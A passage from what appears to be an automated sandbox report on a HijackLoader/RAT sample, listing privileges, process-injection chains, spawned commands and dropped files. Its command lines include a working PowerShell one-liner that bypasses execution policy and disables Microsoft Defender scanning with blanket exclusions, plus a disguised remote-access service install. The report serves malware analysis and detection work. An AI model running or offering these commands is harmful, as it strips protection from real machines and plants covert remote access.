Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1636 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 4436 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 4436 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4436 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4436 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4436 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4016 wrote to memory of 5072 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 5072 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 5072 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 5072 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5072 wrote to memory of 1904 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1904 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1768 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Users\Admin\AppData\Local\naver\naver.exe
PID 5072 wrote to memory of 1768 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Users\Admin\AppData\Local\naver\naver.exe
PID 1876 wrote to memory of 716 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 716 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\system32\wbem\wmic.exe
PID 1876 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\system32\wbem\wmic.exe
PID 1876 wrote to memory of 4864 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 4864 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 4592 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\system32\wbem\wmic.exe
PID 1876 wrote to memory of 4592 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\system32\wbem\wmic.exe
PID 1876 wrote to memory of 4284 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 4284 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 988 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 988 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\wbem\wmic.exe
PID 1876 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1876 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"

C:\Users\Admin\AppData\Local\naver\naver.exe

C:\Users\Admin\AppData\Local\naver\naver.exe -install

C:\Users\Admin\AppData\Local\naver\naver.exe

"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o45equpc.ovp.ps1


C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log


C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive


C:\Users\Admin\AppData\Local\naver\naver.exe


C:\Users\Admin\AppData\Local\naver\naver.msh
